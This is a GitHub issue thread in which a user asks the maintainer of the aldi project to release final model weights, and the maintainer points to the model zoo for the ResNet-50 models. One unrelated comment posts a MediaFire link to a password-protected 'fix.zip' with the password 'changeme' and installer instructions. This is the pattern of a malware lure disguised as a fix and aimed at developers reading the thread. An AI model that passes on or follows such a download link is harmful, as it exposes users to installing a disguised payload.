### ISSUE TITLE
Final models

### ISSUE THREAD

**Issue by liuyvchi** [justinkay/aldi#32]
Hello. Could you please release the weights for the final models on the model zoo page? Thanks!

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justinkay** [comment]
Hi @liuyvchi , final Resnet-50 backbone models are now available in the [model zoo](https://github.com/justinkay/aldi/blob/main/docs/MODELS.md). Will add the VitDet models soon!

**Comment by liuyvchi** [comment]
Thanks! looking forward to your final VitDet model.

**Comment by liuyvchi** [comment]
> Hi @liuyvchi , final Resnet-50 backbone models are now available in the [model zoo](https://github.com/justinkay/aldi/blob/main/docs/MODELS.md). Will add the VitDet models soon!

Hi, do you plan to release the VitDet models?
